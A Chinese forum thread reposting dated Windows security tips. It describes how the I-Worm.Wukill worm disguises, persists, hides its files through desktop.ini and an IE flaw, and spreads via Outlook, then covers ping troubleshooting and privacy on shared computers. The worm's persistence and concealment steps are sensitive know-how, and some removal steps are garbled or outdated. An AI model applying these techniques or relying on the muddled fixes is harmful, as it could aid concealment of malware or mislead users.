在網上看到了一篇帖子。I-Worm.Wukill
破壞方法:這個病毒採用資料夾圖示,具有很大迷惑性。該病毒執行後,會將自己大量複製到其他目錄中。
一、 病毒首次執行時將顯示"This File Has Been Damage!";

二、 將自己複製到windows目錄下並改名為Mstray.exe;

三、 修改註冊表:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
以達到其自啟動的目的;

四、 枚舉磁牒目錄,在每個根目錄下解壓縮下列文件:
winfile.exe 病毒主體程序
coment.htt 利用IE漏洞使用同一個目錄下的"winfile.exe",內容為隱藏。
desktop.ini 系統為隱藏。採用web方式瀏覽資料夾時,系統會使用該檔案,該檔案使用coment.htt ,從而啟動病毒。

五、 病毒修改註冊表,隱藏系統檔案、隱藏受系統保護的文件、隱藏已知的副檔名稱。
這樣,用戶看不到coment.htt和desktop.ini, winfile.exe被隱藏後面明,又是資料夾圖示,用戶極容易認為是資料夾而點擊。
同時病毒在當前路徑下產生的自身拷貝,名稱採用上級目錄,或者是當前視窗的標題,增加隱蔽性。

六、病毒使用Outlook傳送攜帶病毒的郵件。
你先試試:
1 [在執行裡輸入REGEDIT (進入註冊表編輯器) 在編輯工具裡點吉搜尋 輸winfile 確定,即輸出winfile.ini 移除它 然後回盤裡就可以移除了 !]
2 用KV2004昇級版在網上進行了最新的昇級後,執行KV2004就可以了
利用Ping指令判定網路故障 (sindasun)

Ping 是Windows系列原有的的一個可執行指令。利用它可以檢查網路是否能夠連通,用好它可以很好地說明 我們分析判定網路故障。套用格式:Ping IP位址。該指令還可以加許多參數使用,具體是按鍵輸入Ping按Enter鍵即可看到詳細說明。
  #11.Ping本地機IP
  例如本地機IP位址為:172.168.200.2。則執行指令Ping 172.168.200.2。如果網路卡安裝組態沒有問題,則應有類似下列顯示:
  Replay from 172.168.200.2bytes=32 time<10ms
  Ping statistics for 172.168.200.2
  PacketsSent=4 Received=4Lost=00% loss
  Approximate round trip times in milli-seconds
  Minimum=0msMaxiumu=1msAverage=0ms
  如果在MS-DOS方式下執行此指令顯示內容為:Request timed out,則表明網路卡安裝或組態有問題。將網線中斷連線再次執行此指令,如果顯示正常,則說明本地機使用的IP位址可能與另一台正在使用的機器IP位址重複了。如果仍然不正常,則表明本地機網路卡安裝或組態有問題,需繼續檢查相關網路組態。
  #12.Ping網路閘道IP
  假定網路閘道IP為:172.168.6.1,則執行指令Ping 172.168.6.1。在MS-DOS方式下執行此指令,如果顯示類似以下訊息:
  Reply from 172.168.6.1 bytes=32 time=9ms TTL=255
  Ping statistics for 172.168.6.1
  PacketsSent=4Received=4Lost=00% loss
  Approximate round trip times in milli-seconds
  Minimum=1msMaximum=9msAverage=5ms
  則表明區域網路中的網路閘道路由器正在正常執行。反之,則說明網路閘道有問題。
  #13.Ping遠端IP
  這一指令可以檢測本地機能否正常訪問Internet。比如本機電信運營商的IP位址為:202.102.48.141。在MS-DOS方式下執行指令:Ping 202.102.48.141,如果螢幕顯示:
  Reply from 202.102.48.141 bytes=32 time=33ms TTL=252
  Reply from 202.102.48.141 bytes=32 time=21ms TTL=252
  Reply from 202.102.48.141 bytes=32 time=5ms TTL=252
  Reply from 202.102.48.141 bytes=32 time=6ms TTL=252
  Ping statistics for 202.102.48.141
  PacketsSent=4Received=4Lost=00% loss
  Approximate round trip times in milli-seconds
  Minimum=5msMaximum=33msAverage=16ms
  則表明執行正常,能夠正常接入網際網路。反之,則表明主機文件(windows/host)存在問題。

東西搶註:注意一下:衝擊波之後的DNS伺服器都是禁止PING的也就是關閉了ICMP傳輸協定的
這樣大家可以使用TRACERT這個指令跟蹤資料包,也是可以同樣達到目的
當心電腦暴露你的隱私 (sindasun)

如果使用的是辦公室、網咖等地的公共用機,你的很多秘密就可能暴露在別人眼前。
  #1一、作業系統
  如果想把屬於隱私的圖片、視瀕片斷或者重要我的文件文件等儲存在公共電腦中,很多人採取的辦法把文件或資料夾的內容改為「隱藏」,然後再把它們藏匿在電腦中某個不起眼的資料夾裡。可在Win 98的「開始」→「我的文件」表單中,會記錄最近開啟過的15個檔案名,因此別人可以點擊相應的檔案名來開啟文件,就算你已經把文件藏起來了,別人也可以從這裡窺視你的秘密。
  解決辦法:要清除這些痕跡,你可以用滑鼠右鍵點擊工作管理欄的「內容」,後點「開始選單程序」,再點「清除」就可以移除「我的文件」表單中的內容和其他個人歷史記錄列表了。這樣做可以在一定程度上保護你的秘密,但別人還可以通過「開始」表單中的「搜尋」功能來搜尋你的重要文件,按文件的類別把硬碟上所有的圖形文件、*.txt、*.doc文件等找出來,然後一個一個地檢視,秘密依然存在被洩露的可能。
  報紙上曾介紹過一種修改註冊表隱藏硬碟的辦法,即把要隱藏的文件專門放到某個硬碟(如F盤)上,然後修改註冊表把這個盤藏起來(在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下新增一個Dword值「NoDrives」,再設定鍵值,例如把鍵值設為20就可以隱藏F盤),在檔案總管中就看不到這個盤了。這種辦法表面上無懈可擊,被隱藏的盤對於大多數軟體都不可見,你通過「搜尋」功能也無法找到該碟上的文件,一些所謂的電腦高手也把這種辦法當做可靠的保密手段。然而這種方法有重大的漏洞,在DOS狀態下這個盤完全可見,而在Windows下,我找到一種非常簡單的辦法破除這種限制。只要在「我的電腦」或者IE瀏覽器的位址欄中按鍵輸入磁碟代號「F:」,然後打Enter鍵鍵,這個盤的內容就一覽無餘,所有的秘密蕩然無存。
  解決辦法:如果對保密的要求比較高,可以用一些軟體來加密或者隱藏,可以基本解決保密問題。但是,就算是用加密/隱藏軟體,也不是十分安全的。一方面有些隱藏軟體有漏洞,對於熟悉電腦的用戶來說,並不難破解限制;另一方面一些加密/隱藏軟體的加密程度不高,可找到相應的軟體來破解密碼。所以對於保密要求非常高的用戶來說,如果是比較小的文件,最好不要儲存在硬碟上,可以儲存在軟碟上,如果文件太大,不能儲存在軟碟上,可以用PGP之類的超強加密檔案來加密。
  #1二、常用程序
  Windows下的很多應用程式,如Word、Excel、媒體播放器Media Player、RealPlayer等,會在該程序「文件」表單下列出最近開啟過的一些檔案名。儘管你已經把文件藏匿在電腦中的某個地方了,但別人還是可以通過這些檔案名清單輕易開啟相應的文件。
  解決辦法:對於Word 2000、Excel 2000等,可以在Word/Excel的「工具」→「選項」的「一般」選擇項中把「列出最近所用文件」的個數改為0;在媒體播放器和Realplayer中清除這些歷史記錄,只能到註冊表中移除,要清除Realplayer中的歷史記錄,則到HKEY_LOCAL_MACHINE\Software\CLASSES\Software\RealNetworks\Realplayer\6.0\Preferences\MostRecentClips1移除相關鍵值(Realplayer預設值情況下是在「文件」表單中顯示最近播放過的8個剪輯,Mostrecentclip1只是第一個,要移除其他幾個你還須要分別移除)。要清除媒體播放器上的記錄只有到註冊表中,移除HKEY_HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList下的鍵值。通過註冊表來清除歷史記錄比較麻煩,而且對新手來說具有一定危險性。
  變通的解決辦法是:在看完這些視瀕片斷之後,把文件的副檔名改為Realplayer或者媒體播放器等不支持的虛假副檔名。例如你剛才看的視瀕檔案名字叫做123.mpeg,你可以把它的檔案名改為sdk.dhl,然後把它重新藏到其他不起眼的資料夾中,最好遠離原來的資料夾。雖然原先的記錄還儲存在「文件」表單中,但是Realplayer、媒體播放器已經找不到該檔案了。下次你要再次觀看時,可以重新把文件的副檔名修改回來。修改文件副檔名對於隱藏其他檔案類型的文件也是一個簡單有效的辦法,雖然這種辦法並不很保險,但對於很多人而言,這種辦法已經能基本滿足要求了。相比之下Yahoo!Player在這方面就做得好得多,你可以到Yahoo!Player的「Edit→Prefenrence→General」中勾選「On exit,clear history(結束時清除歷史記錄)」,這樣以後你每次關閉Yahoo!Player就會自動清除歷史記錄。
  #1三、IE瀏覽器
  如果你是上網用戶,更要小心你的秘密被洩露了。IE瀏覽器會記錄你訪問過的站點的位址,別人可以通過歷史記錄來檢視。
  解決辦法:如果你不想讓別人知道你的行蹤,可以通過點擊瀏覽器「工具→Internet選項→一般」選擇項中「清除歷史記錄」。
  對於那些通過登入Web收發電子郵件的用戶來說,你所看過的信別人可以輕易看到,這是一個極其嚴重卻被廣泛忽視的安全問題。那些在網咖上網的人士要特別小心了,說不定你前腳剛走,那些別具用心的人就來偷看你的秘密了。通過點擊瀏覽器的「歷史」按鈕,可以看到最近一段時間所訪問頁的記錄。在先選項「離線工作」的情況下,再點擊有關E-mail的頁面,別人就可以看到你曾看過的信!
  解決辦法:要消除這個漏洞,僅靠清除歷史記錄是不夠的,別人即使通過歷史記錄看不到你的訪問記錄了,但是可以到C:\Windows\Temporary Internet Files資料夾中去檢視全部內容。關鍵就是把這個資料夾中的內容清除,你可以點擊瀏覽器「工具」→「Internet選項」之「一般」選擇項中的「移除文件」來移除所有的離線內容。
  你可能會發現,當你用滑鼠點擊電子郵件的用戶名登入框時,會列出曾經輸入過的電子郵件位址;當你點擊電子郵件的主題欄時,可能會列出曾經輸入過的郵件標題;當你在論壇中的寫帖子時的標題欄中也會列出曾經輸入過的一些標題。所有這些表單中的訊息都有可能會洩露你不想他人知道的訊息。IE瀏覽器具有的「自動完成」功能儲存於了以前曾按鍵輸入過的 列項,因此當你下次填寫表單的時候,會自動列出可能相符的項。
  解決辦法:要清除記錄,可點擊IE瀏覽器的「工具」→「Internet選項」→「內容」選擇項中的「自動完成」,然後點「清除表單」來清除自動完成歷史記錄。
  #1∽四、網路聊天與郵件
  當你在聊天室、論壇中胡說八道的時候,別以為沒有人知道你來自何方,你的IP位址早已經被記錄在案。當你用QQ聊天時,別人也有辦法知道你的IP位址,只要到網上下載安裝一個查IP位址的小工具,就可以看到你的IP位址,然後通過「追捕」軟體查出你是哪個地方的(誤報可能性大),所以別奇怪有人怎麼會知道你的地理方位。
  解決方案:如要想隱藏自己的IP位址,最有效的還是通過代理伺服器上網。
  如今網路黑客工具(木馬程序)的氾濫,使得很多並非真正黑客的人也可以遠端控制你的電腦,竊取你的訊息。當別人用QQ或者E-mail向你發相片或者歌曲的時候,說不定你正在接收一個木馬程序。電腦如果中了木馬程序後,就沒有什麼秘密可言了。
  解決方案:要防範黑客程序,除了不要下載來路不明的軟體外,安裝防火牆和反病毒程序是最有效的措施。如果你對網路安全性異常敏感,還應注意對Windows系統的安全漏洞打修正檔。
  你不但要防範來自網上的危險,你更要防範來自現實中的竊密者。在更多的情況下,你週圍的人才是真正最危險的人。現在很多人都用QQ來聊天,也正是QQ成為洩露你秘密的主要渠道。針對QQ的竊密工具很多,可以偷竊密碼、偷看聊天記錄等,簡直讓人防不勝防。
  解決方案:如果是網咖等公共場所使用QQ,聊天後最好把聊天記錄移除。移除聊天記錄主要有兩種辦法,如果你對電腦不太熟悉,可以點擊QQ的「消息管理」,在彈出的「消息管理器」視窗中用右鍵點擊你的號碼(在左上角),然後點「移除消息」,就可以移除全部聊天記錄,如果你覺得這些聊天記錄對你很重要想要儲存它,你可以在「消息管理」中,用右鍵點擊自己的號碼,再點擊「匯出聊天記錄為文本文件」,把它們制作備份到軟碟上或發到自己的郵信箱儲存後再移除硬碟上的聊天記錄。有一定電腦使用經驗的用戶,可以採取第二種方法:到QQ所在的安裝目錄C:\Program Files\Tencent,移除以你自己的QQ號碼命名的資料夾,別忘了還要清空資源回收桶哦!從硬碟上移除該檔案夾比第一種辦法好,因為除了移除聊天記錄外,還可在「一定程度上」防止他人用破解QQ密碼的工具從這個資料夾中偷竊你的密碼,請注意只是「在一定程度上」,因為還可以通過其他途徑來偷竊密碼。
  在公共場所上網,要小心QQ號碼被盜,可QQ號碼被盜的現象依然不斷。
  解決方案:要防止QQ的密碼被盜,還應注意幾點:應儘快將QQ昇級到更安全更完善的最新版本。此外最好不要以生日、 名字、電話號碼等個人訊息來作為密碼,密碼要複雜,不定期更換,當然也要方便你記憶。最好是數位加英文加標點符號,816位最合適。如果你的密碼長度很短或者太簡單的時候,就容易被QQ密碼猜解器在短時間內猜解出來。設定完密碼後可以到騰訊網站申請密碼保護功能,被盜後方便取回密碼。
  如今網上流傳一些QQ密碼竊取軟體,執行它之後,在你輸入密碼登入QQ的同時記錄密碼到某個文件中,對這類軟體很難防範,你不僅僅要注意QQ的密碼被盜,你的其他密碼也要小心被盜。很多人為了圖省事,電子郵件和QQ是同一密碼,但這樣做存在嚴重的安全隱患,因為一旦一個密碼被竊,就全線失守了。要完全防範別人偷你的密碼,真的很不容易。最可怕的是一些在後台秘密監視電腦活動的軟體,這些監視軟體可以記錄你使用電腦的所有程序,包括你的所有鍵盤按鍵輸入,當然你的密碼也都通通被記錄(包括QQ密碼、E-mail密碼在內的所有密碼全都暴露無遺)。要發現這類軟體的蹤跡很難,這類程序執行時,按「Ctrl+Alt+Del」也無法看到,反病毒軟體也不監控這類軟體。目前沒有很好的辦法來發現這類監視軟體。
  解決方案:到控制台中的「增加/刪除程式」內容中,看看裡面有沒有什麼可疑的程序;另外就是從「開始」表單中的「執行」中按鍵輸入「msconfig」,在開啟的「系統組態程序」之「啟動」項中,查查有沒有可疑的啟動項。但是這些辦法,都很不可靠。要比較徹底發現這類程序,可以使用winkill之類的記憶體駐停留監控程序來監測有沒有異常的情況,但是使用winkill來發現這類軟體要求對電腦比較熟悉,使用起來也不方便,而且winkill只能發現可疑者而不能判斷它究竟是不是「監視軟體」。要防範這類程序真的很難,讓你防不勝防,稍不注意你的秘密就全被暴露。你還有秘密嗎?其實你已經沒有了……

推薦]網上訊息安全的防範技巧十三法

二十世紀九十年代末出現的INTERNET標誌著人類社會已經進入了訊息化時代,在這個時代,越來越多的人已經開始離不開Internet網路。然而在現有的Internet的環境中,君子風度和信任感已經所剩無幾了。社會上能找到的所有的凶險, 卑鄙和投機, Internet上應有盡有。從Internet誕生之日起, 特別是自90年代它向公眾開放以來, 它已經成為眾矢之的。尤其是在一些電子商務網站進行購物,或者希望註冊成為某些網站的會員的時候,我們要特別注意保護自己個人訊息在網上的安全。這是因為我們通過表格來註冊和提交個人訊息時,程序會把這些訊息打包傳送到目的地,在傳送到目的地的程序中需要經過一系列的網站中轉,當然被傳送的訊息就很容易在所經過的網路上留下自己的蹤跡,如果這些蛛絲馬跡不幸被某些別有用心的人截獲並加以利用,麻煩可就大了--雖然這種幾率比較低,但面對如今一無法規二無規則、尚顯無序的網路,總應該多加小心。下面,筆者就為各個用戶提供一些保護網上訊息安全的方法措施,希望能夠對各位用戶。
1、不輕易執行不明真相的程序
如果你收到一封帶有附件的電子郵件,且附件是副檔名為EXE一類的文件,這時千萬不能貿然執行它,因為這個不明真相的程序,就有可能是一個系統破壞程序。攻擊者常把系統破壞程序換一個名字用電子郵件發給你,並帶有一些欺騙性主題,騙你說一些:「這是個好東東,你一定要試試」,「幫我測試一下程序」之類的話。你一定要警惕了!對待這些表面上很友好、跟善意的郵件附件,我們應該做的是立即移除這些來歷不明的文件。
2、遮閉小甜餅訊息
小甜餅就是Cookie,它是Web伺服器傳送到電腦裡的資料檔案,它記錄了諸如用戶名、密碼和關於用戶興趣取向的訊息。實際上,它使你訪問同一站點時感到方便,比如,不用重新輸入密碼。但Cookies收集到的個人訊息可能會被一些喜歡搞「惡作劇」的人利用,它可能造成安全隱患,因此,我們可以在瀏覽器中做一些必要的設定,要求瀏覽器在接受Cookie之前提醒您,或者乾脆拒絕它們。通常來說,Cookie會在瀏覽器被關閉時自動從電腦中移除,可是,有許多Cookie會一反常態,始終儲存於在硬碟中收集用戶的相關資訊,其實這些Cookie就是被設計成能夠駐停留在我們的電腦上的。隨著時間的推移,Cookie訊息可能越來越多,當然我們的心境也因此變得越來越不踏實。為了確保萬無一失,對待這些已有的Cookie訊息應該從硬碟中立即清除,並在瀏覽器中調整Cookie設定,讓瀏覽器拒絕接受Cookie訊息。遮閉Cookie的操作步驟為:首先用滑鼠按下表單欄中的「工具」表單項,並從下拉表單中選項「Internet選項」;接著在選項設定項中選「安全」標籤,並按下標籤中的「自訂等級」按鈕;同時在開啟的「安全性設定」對話視窗中找到關於Cookie的設定,然後選項「禁用」或「提示」。
3、不同的地方用不同的密碼
對於經常上網的用戶,可能會發現在網上需要設定密碼的情況有很多。有很多用戶圖方便記憶,不論在什麼地方,都使用同一個密碼,殊不知他們已不知不覺地留下了一個安全隱患。因為攻擊者一般在破獲到用戶的一個密碼後,會用這個密碼去嘗試用戶每一個需要甬道密碼的地方!想想看,別人用一個密碼慢慢地盜用你的帳號上網;再去偷看與冒發你的E-mail;也許還會用你的身份去聊天室損害你的形象;還有.....,想想看那後果該有多嚴重呀!所以筆者強烈建議各位用戶,每個不同的地方用不同的密碼,一定不能不同,同時要把各個對應的密碼記下來,以備日後查用。另外一點就是我們在設定密碼時,不應該使用字典中可以查到的單詞,也不要使用個人的生日,最好是字母、符號和數位混用,多用特殊字元,諸如%、&、#、和$,並且在允許的範圍內,越長越好,以保證你的密碼不易被人猜中。
4、 遮閉ActiveX控件
由於ActiveX控件可以被嵌入到HTML頁面中,並下載到瀏覽器端加以執行,因此會給瀏覽器端造成一定程度的安全威脅。目前已有證據表明,在客戶端的瀏覽器中,如IE中插入某些ActiveX控件,也將直接對伺服器端造成意想不到的安全威脅。同時,一些其他技術,如內嵌於IE的VB Script語言,用這種語言產生的客戶端可執行的程式模組,也同 Java小程序一樣,有可能給客戶端帶來安全效能上的漏洞。此外,還有一些新技術,如ASP(Active serv er Pages)技術,由於用戶可以為ASP的輸出隨意增加客戶指令碼、ActiveX控件和動態HTML,因此在ASP指令碼中同樣也都存在著一定的安全隱患。所以,用戶如果要保證自己在英特網上的訊息絕對安全,可以遮閉掉這些可能對電腦安全構成威脅的ActiveX控件,具體操作步驟為:首先用滑鼠按下表單欄中的「工具」表單項,並從下拉表單中選項「Internet選項」;接著在選項設定項中選「安全」標籤,並按下標籤中的「自訂等級」按鈕;同時在開啟的「安全性設定」對話視窗中找到關於ActiveX控件的設定,然後選項「禁用」或「提示」。
5、定期清除快取、歷史記錄以及臨時資料夾中的內容
我們在上網瀏覽訊息時,瀏覽器會把我們在上網程序中瀏覽的訊息儲存在瀏覽器的相關設定中,這樣下次再訪問同樣訊息時可以很快地達到目的地,從而提高了我們的瀏覽效率。但是瀏覽器的快取、歷史記錄以及臨時資料夾中的內容保留了我們太多的上網的記錄,這些記錄一旦被那些無聊的人得到,他們就有可能從這些記錄中尋找到有關個人訊息的蛛絲馬跡。為了確保個人訊息資料的絕對安全,我們應該定期清理快取、歷史記錄以及臨時資料夾中的內容。清理瀏覽器快取並不麻煩,具體的操作方法如下:首先用滑鼠按下表單欄中的「工具」表單項,並從下拉表單中選項「Internet選項」;接著在選項設定項中選「一般」標籤,並按下標籤中的「移除文件」按鈕來移除瀏覽器中的臨時資料夾中的內容;然後在同樣的餓對話視窗中按下「清除歷史記錄」按鈕來移除瀏覽器中的歷史記錄和快取中的內容。
6、不隨意透露任何個人訊息
在網上瀏覽訊息時,經常會發現需要用戶註冊自己個人訊息資料的表單。這些站點通程序序設計達到一種不填寫表單就不能獲取自己需要的訊息的目的。面對這種強迫用戶註冊個人訊息的情況,我們最好的辦法是不要輕易把自己真實的訊息提交給他們,特別是不要向任何人透露你的密碼。還有,在使用ICQ、OICQ等網路軟體以及註冊免費E-mail訊息的時候,我們都需要填寫一些個人資料。某些資料是必須填寫的,自然無法略過。但是對於可填可不填但又涉及自己隱私的資料,還是能免就免,您有權利保持沉默,否則您所說的一切,有可能在網路上被黑客利用。這一沉默原則同樣適用於聊天室,在弄清楚聊天室的環境和各個人物之前,使用虛擬的網名應該是明智的選項。你應該注意你常去的地方是不是把你的IP位址顯示了出來,特別是在一些聊天室裡,你一定要小心了!可能攻擊你的人就是這樣才能控制你的。因為我們撥號上網的用戶IP是動態的,你每次上網的IP是伺服器隨機分配給你的,所以自己的IP如果不讓人知道,是不會遭到襲擊的。
7、突遇莫名其妙的故障時要及時檢查系統資訊
上網程序中,突然覺得電腦工作不對勁時,彷彿感覺有人在遙遠的地方遙控你。這時,你必須及時停止手中的工作,立即按Ctrl+Alt+Del復合鍵來檢視一下系統是否執行了什麼其他的程序,一旦發現有莫名其妙的程序在執行,你馬上停止它,以免對整個電腦系統有更大的威脅。但是並不是所有的程序執行時出現在程序列表中,有些程序例如Back Orifice(一種黑客的後門程序)並不顯示在Ctrl+Alt+Del復合鍵的行程列表中,所以如果你的電腦中執行的是WIN98或者WIN2000作業系統,最好執行「附件」/「系統工具」/「系統資訊」,然後雙按「軟體環境」,選項「正在執行工作」,在工作列表中尋找自己不熟悉的或者自己並沒有執行的程序,一旦找到程序後應立即終止它,以防後患
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 08:07 AM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2024, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1